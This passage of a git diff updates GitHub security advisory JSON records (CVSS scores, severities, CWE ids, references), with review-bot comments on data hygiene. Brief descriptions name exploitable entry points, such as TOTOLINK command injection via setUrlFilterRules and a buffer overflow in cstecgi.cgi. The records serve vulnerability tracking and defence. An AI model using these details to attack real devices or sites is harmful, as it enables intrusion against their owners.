"GHSA-6px6-2jx5-44xw", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-29T15:30:24Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2024-0811" ], "details": "Inappropriate implementation in Extensions API in Google Chrome prior to 121.0.6167.85 allowed an attacker who convinced a user to install a malicious extension to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Low)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } ], "affected": [ @@ -39,7 +42,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T00:15:08Z" 
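Review bot: The new GHSA-6ppv-xf37-rvx6 record stores a rejected candidate (its `details` is the CNA's "DO NOT USE THIS CANDIDATE NUMBER" notice) as an ordinary advisory, so any consumer that matches on `aliases` will surface CVE-2023-46050 as a live finding despite the empty `severity` and `affected` arrays. The OSV schema this file declares (`"schema_version": "1.4.0"`) has a top-level `withdrawn` timestamp for exactly this situation; if the import pipeline can populate it, add `"withdrawn": "<REJECTION_TIMESTAMP_PLACEHOLDER>"` next to `modified` so downstream tooling can filter the record out. If the pipeline deliberately imports rejected CVEs without that field, that decision is worth a one-line note in the importer so the empty `severity`/`affected` pair is not mistaken for an incomplete sync.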
diff --git a/advisories/unreviewed/2024/01/GHSA-6rx9-pq2q-p9rg/GHSA-6rx9-pq2q-p9rg.json b/advisories/unreviewed/2024/01/GHSA-6rx9-pq2q-p9rg/GHSA-6rx9-pq2q-p9rg.json index 9f56fa3572c53..5ea4b3f18a6f6 100644 --- a/advisories/unreviewed/2024/01/GHSA-6rx9-pq2q-p9rg/GHSA-6rx9-pq2q-p9rg.json +++ b/advisories/unreviewed/2024/01/GHSA-6rx9-pq2q-p9rg/GHSA-6rx9-pq2q-p9rg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6rx9-pq2q-p9rg", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48131" ], "details": "An issue in CHIGASAKI BAKERY mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:57Z" diff --git a/advisories/unreviewed/2024/01/GHSA-6wrq-j9qq-5v7v/GHSA-6wrq-j9qq-5v7v.json b/advisories/unreviewed/2024/01/GHSA-6wrq-j9qq-5v7v/GHSA-6wrq-j9qq-5v7v.json index a99a1cbe9fae4..6707d3fde14e2 100644 --- a/advisories/unreviewed/2024/01/GHSA-6wrq-j9qq-5v7v/GHSA-6wrq-j9qq-5v7v.json +++ b/advisories/unreviewed/2024/01/GHSA-6wrq-j9qq-5v7v/GHSA-6wrq-j9qq-5v7v.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-6xwv-xr2m-rj2h/GHSA-6xwv-xr2m-rj2h.json b/advisories/unreviewed/2024/01/GHSA-6xwv-xr2m-rj2h/GHSA-6xwv-xr2m-rj2h.json index 373b6bc0ec9c9..ec46b43325211 100644 --- a/advisories/unreviewed/2024/01/GHSA-6xwv-xr2m-rj2h/GHSA-6xwv-xr2m-rj2h.json +++ b/advisories/unreviewed/2024/01/GHSA-6xwv-xr2m-rj2h/GHSA-6xwv-xr2m-rj2h.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-6xwv-xr2m-rj2h", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-29T21:30:27Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-47201" ], "details": "A plug-in manager origin validation vulnerability in the Trend Micro Apex One security agent could allow a local attacker to escalate privileges on affected installations.\n\nPlease note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThis vulnerability is similar to, but not identical to, CVE-2023-47200.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7258-xmq8-x5x7/GHSA-7258-xmq8-x5x7.json b/advisories/unreviewed/2024/01/GHSA-7258-xmq8-x5x7/GHSA-7258-xmq8-x5x7.json index faad40537e8b2..97d5f947fb9c8 100644 --- a/advisories/unreviewed/2024/01/GHSA-7258-xmq8-x5x7/GHSA-7258-xmq8-x5x7.json +++ b/advisories/unreviewed/2024/01/GHSA-7258-xmq8-x5x7/GHSA-7258-xmq8-x5x7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7258-xmq8-x5x7", - "modified": "2024-01-23T03:31:07Z", + "modified": "2024-01-29T21:30:26Z", "published": "2024-01-23T03:31:07Z", "aliases": [ "CVE-2023-42915" ], "details": "Multiple issues were addressed by updating to curl version 8.4.0. This issue is fixed in macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 16.7.5 and iPadOS 16.7.5. Multiple issues in curl.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ 
@@ -55,7 +58,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T01:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7299-g634-x782/GHSA-7299-g634-x782.json b/advisories/unreviewed/2024/01/GHSA-7299-g634-x782/GHSA-7299-g634-x782.json index dc65911542174..d994cce3e9012 100644 --- a/advisories/unreviewed/2024/01/GHSA-7299-g634-x782/GHSA-7299-g634-x782.json +++ b/advisories/unreviewed/2024/01/GHSA-7299-g634-x782/GHSA-7299-g634-x782.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7299-g634-x782", - "modified": "2024-01-23T12:30:30Z", + "modified": "2024-01-30T18:30:19Z", "published": "2024-01-23T12:30:30Z", "aliases": [ "CVE-2024-22076" ], "details": "MyQ Print Server before 8.2 patch 43 allows Unauthenticated Remote Code Execution.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T11:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-73m5-j333-fcwc/GHSA-73m5-j333-fcwc.json b/advisories/unreviewed/2024/01/GHSA-73m5-j333-fcwc/GHSA-73m5-j333-fcwc.json index 3ae24684f3872..0a976ca99cc46 100644 --- a/advisories/unreviewed/2024/01/GHSA-73m5-j333-fcwc/GHSA-73m5-j333-fcwc.json +++ b/advisories/unreviewed/2024/01/GHSA-73m5-j333-fcwc/GHSA-73m5-j333-fcwc.json @@ -68,6 +68,10 @@ { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2024/Jan/40" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-7578-x5c2-rhcx/GHSA-7578-x5c2-rhcx.json b/advisories/unreviewed/2024/01/GHSA-7578-x5c2-rhcx/GHSA-7578-x5c2-rhcx.json index cf9c2a749eb6f..bb0c69aaf6aed 100644 
--- a/advisories/unreviewed/2024/01/GHSA-7578-x5c2-rhcx/GHSA-7578-x5c2-rhcx.json +++ b/advisories/unreviewed/2024/01/GHSA-7578-x5c2-rhcx/GHSA-7578-x5c2-rhcx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7578-x5c2-rhcx", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-02-01T21:30:30Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-51199" ], "details": "Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-120" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7695-f938-c2jf/GHSA-7695-f938-c2jf.json b/advisories/unreviewed/2024/01/GHSA-7695-f938-c2jf/GHSA-7695-f938-c2jf.json index 6fcb2677a33af..59be713bbdead 100644 --- a/advisories/unreviewed/2024/01/GHSA-7695-f938-c2jf/GHSA-7695-f938-c2jf.json +++ b/advisories/unreviewed/2024/01/GHSA-7695-f938-c2jf/GHSA-7695-f938-c2jf.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-798" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-78cp-c4p5-694f/GHSA-78cp-c4p5-694f.json b/advisories/unreviewed/2024/01/GHSA-78cp-c4p5-694f/GHSA-78cp-c4p5-694f.json index 18efb81b022cc..447755a19c9e8 100644 --- a/advisories/unreviewed/2024/01/GHSA-78cp-c4p5-694f/GHSA-78cp-c4p5-694f.json +++ b/advisories/unreviewed/2024/01/GHSA-78cp-c4p5-694f/GHSA-78cp-c4p5-694f.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-798" ], "severity": "HIGH", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2024/01/GHSA-78m6-vgh2-9c4v/GHSA-78m6-vgh2-9c4v.json b/advisories/unreviewed/2024/01/GHSA-78m6-vgh2-9c4v/GHSA-78m6-vgh2-9c4v.json index 642935371dd69..7451b0d1d2798 100644 --- a/advisories/unreviewed/2024/01/GHSA-78m6-vgh2-9c4v/GHSA-78m6-vgh2-9c4v.json +++ b/advisories/unreviewed/2024/01/GHSA-78m6-vgh2-9c4v/GHSA-78m6-vgh2-9c4v.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-78m6-vgh2-9c4v", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-41177" ], "details": "Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker.\n\nPlease note, this vulnerability is similar to, but not identical to, CVE-2023-41178.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-78p2-p949-pjvr/GHSA-78p2-p949-pjvr.json b/advisories/unreviewed/2024/01/GHSA-78p2-p949-pjvr/GHSA-78p2-p949-pjvr.json index dc228a6ceb73d..ee0259d383754 100644 --- a/advisories/unreviewed/2024/01/GHSA-78p2-p949-pjvr/GHSA-78p2-p949-pjvr.json +++ b/advisories/unreviewed/2024/01/GHSA-78p2-p949-pjvr/GHSA-78p2-p949-pjvr.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-78p2-p949-pjvr", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-52038" ], "details": "An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_415C80 function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-79vw-r2j5-gv89/GHSA-79vw-r2j5-gv89.json b/advisories/unreviewed/2024/01/GHSA-79vw-r2j5-gv89/GHSA-79vw-r2j5-gv89.json index a1fba6176851e..5266fbe6c95d8 100644 --- a/advisories/unreviewed/2024/01/GHSA-79vw-r2j5-gv89/GHSA-79vw-r2j5-gv89.json +++ b/advisories/unreviewed/2024/01/GHSA-79vw-r2j5-gv89/GHSA-79vw-r2j5-gv89.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-79vw-r2j5-gv89", - "modified": "2024-01-26T09:30:23Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:23Z", "aliases": [ "CVE-2023-48135" ], "details": "An issue in mimasaka_farm mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:58Z" diff --git a/advisories/unreviewed/2024/01/GHSA-79x7-r2x4-xpj2/GHSA-79x7-r2x4-xpj2.json b/advisories/unreviewed/2024/01/GHSA-79x7-r2x4-xpj2/GHSA-79x7-r2x4-xpj2.json index 4b08096dde22d..588f8be0c87eb 100644 
--- a/advisories/unreviewed/2024/01/GHSA-79x7-r2x4-xpj2/GHSA-79x7-r2x4-xpj2.json +++ b/advisories/unreviewed/2024/01/GHSA-79x7-r2x4-xpj2/GHSA-79x7-r2x4-xpj2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-79x7-r2x4-xpj2", - "modified": "2024-01-23T21:30:20Z", + "modified": "2024-01-29T18:31:47Z", "published": "2024-01-23T21:30:20Z", "aliases": [ "CVE-2023-41176" ], "details": "Reflected cross-site scripting (XSS) vulnerabilities in Trend Micro Mobile Security (Enterprise) could allow an exploit against an authenticated victim that visits a malicious link provided by an attacker.\n\nPlease note, this vulnerability is similar to, but not identical to, CVE-2023-41177.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-7c4r-p7c4-2rmg/GHSA-7c4r-p7c4-2rmg.json b/advisories/unreviewed/2024/01/GHSA-7c4r-p7c4-2rmg/GHSA-7c4r-p7c4-2rmg.json new file mode 100644 index 0000000000000..e120d1bb17dd0 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7c4r-p7c4-2rmg/GHSA-7c4r-p7c4-2rmg.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7c4r-p7c4-2rmg", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2024-1001" + ], + "details": "A vulnerability classified as critical has been found in Totolink N200RE 9.3.5u.6139_B20201216. Affected is the function main of the file /cgi-bin/cstecgi.cgi. The manipulation leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252270 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1001" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-main-942df77e9c70495390e4aed2a29f3d13?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252270" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252270" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T14:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7cf2-63mg-hv4j/GHSA-7cf2-63mg-hv4j.json b/advisories/unreviewed/2024/01/GHSA-7cf2-63mg-hv4j/GHSA-7cf2-63mg-hv4j.json new file mode 100644 index 0000000000000..7692cf0ad9ba6 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7cf2-63mg-hv4j/GHSA-7cf2-63mg-hv4j.json 
@@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cf2-63mg-hv4j", + "modified": "2024-01-29T15:30:29Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-40548" + ], + "details": "A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40548" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-40548" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241782" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122", + "CWE-190" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7cm4-cx64-v496/GHSA-7cm4-cx64-v496.json b/advisories/unreviewed/2024/01/GHSA-7cm4-cx64-v496/GHSA-7cm4-cx64-v496.json new file mode 100644 index 0000000000000..c841e232bacc2 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7cm4-cx64-v496/GHSA-7cm4-cx64-v496.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7cm4-cx64-v496", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6165" + ], + "details": "The Restrict Usernames Emails Characters WordPress plugin before 3.1.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6165" + }, + { + "type": "WEB", + "url": "https://github.com/youki992/youki992.github.io/blob/master/others/apply2.md" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/aba62286-9a82-4d5b-9b47-1fddde5da487/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7fpg-4q3m-78rq/GHSA-7fpg-4q3m-78rq.json b/advisories/unreviewed/2024/01/GHSA-7fpg-4q3m-78rq/GHSA-7fpg-4q3m-78rq.json new file mode 100644 index 0000000000000..5fc4683bde410 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7fpg-4q3m-78rq/GHSA-7fpg-4q3m-78rq.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fpg-4q3m-78rq", + "modified": "2024-02-03T00:31:32Z", + "published": "2024-01-29T15:30:29Z", + "aliases": [ + "CVE-2023-6391" + ], + "details": "The Custom User CSS WordPress plugin through 0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6391" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/CVE-2023-6391.txt" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/4098b18d-6ff3-462c-af05-48adb6599cf3/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7hrr-5mgf-rf3v/GHSA-7hrr-5mgf-rf3v.json b/advisories/unreviewed/2024/01/GHSA-7hrr-5mgf-rf3v/GHSA-7hrr-5mgf-rf3v.json new file mode 100644 index 0000000000000..e67406434cb93 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7hrr-5mgf-rf3v/GHSA-7hrr-5mgf-rf3v.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hrr-5mgf-rf3v", + "modified": "2024-01-31T12:30:17Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2024-1098" + ], + "details": "A vulnerability was found in Rebuild up to 3.5.5 and classified as problematic. This issue affects the function QiniuCloud.getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to information disclosure. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252455.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1098" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252455" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/mailemonyeyongjuan/tha8tr/ouiw375l0m8mw5ls" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T12:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7hrx-5vq8-6933/GHSA-7hrx-5vq8-6933.json b/advisories/unreviewed/2024/01/GHSA-7hrx-5vq8-6933/GHSA-7hrx-5vq8-6933.json new file mode 100644 index 0000000000000..e293ea74d299c --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-7hrx-5vq8-6933/GHSA-7hrx-5vq8-6933.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7hrx-5vq8-6933", + "modified": "2024-02-05T21:30:31Z", + "published": "2024-01-31T18:31:25Z", + "aliases": [ + "CVE-2024-23505" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DearHive PDF Viewer & 3D PDF Flipbook – DearPDF allows Stored XSS.This issue affects PDF Viewer & 3D PDF Flipbook – DearPDF: from n/a through 2.0.38.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23505" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/dearpdf-lite/wordpress-pdf-viewer-3d-pdf-flipbook-dearpdf-plugin-2-0-38-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-7j77-3p87-xr63/GHSA-7j77-3p87-xr63.json b/advisories/unreviewed/2024/01/GHSA-7j77-3p87-xr63/GHSA-7j77-3p87-xr63.json index ed818b64affd7..94cdebc404e90 100644 --- a/advisories/unreviewed/2024/01/GHSA-7j77-3p87-xr63/GHSA-7j77-3p87-xr63.json +++ b/advisories/unreviewed/2024/01/GHSA-7j77-3p87-xr63/GHSA-7j77-3p87-xr63.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7j77-3p87-xr63", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-52039" ], "details": "An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_415AA4 function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ 
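Review bot: The `details` string of GHSA-7hrx-5vq8-6933 ends in a literal `\n\n`, trailing padding carried over from the source description that renders as empty lines wherever the text is displayed and carries no information. Trimming the description on import (`details.strip()` or whatever the sync tooling's equivalent is) would keep the records clean; the same padding is present in GHSA-7m9h-xc4x-cg98 and GHSA-87hh-r9jv-r2jq further down in this commit. The second hunk on this line (GHSA-7j77-3p87-xr63) continues in the next hunk, where its severity label and CWE are set.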
@@ -25,9 +28,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-77"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T18:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json b/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json
new file mode 100644
index 0000000000000..1a0e346ba297a
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-7j85-cwr3-f2w3/GHSA-7j85-cwr3-f2w3.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7j85-cwr3-f2w3",
+ "modified": "2024-02-01T06:31:05Z",
+ "published": "2024-01-30T15:30:23Z",
+ "aliases": [
+ "CVE-2024-24332"
+ ],
+ "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the url parameter in the setUrlFilterRules function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24332"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/9/TOTOlink%20A3300R%20setUrlFilterRules.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-7jg3-fhmp-w7fm/GHSA-7jg3-fhmp-w7fm.json b/advisories/unreviewed/2024/01/GHSA-7jg3-fhmp-w7fm/GHSA-7jg3-fhmp-w7fm.json
index 5566542e4c621..3dfab4674892f 100644
--- a/advisories/unreviewed/2024/01/GHSA-7jg3-fhmp-w7fm/GHSA-7jg3-fhmp-w7fm.json
+++ b/advisories/unreviewed/2024/01/GHSA-7jg3-fhmp-w7fm/GHSA-7jg3-fhmp-w7fm.json
@@ -36,7 +36,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-787"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
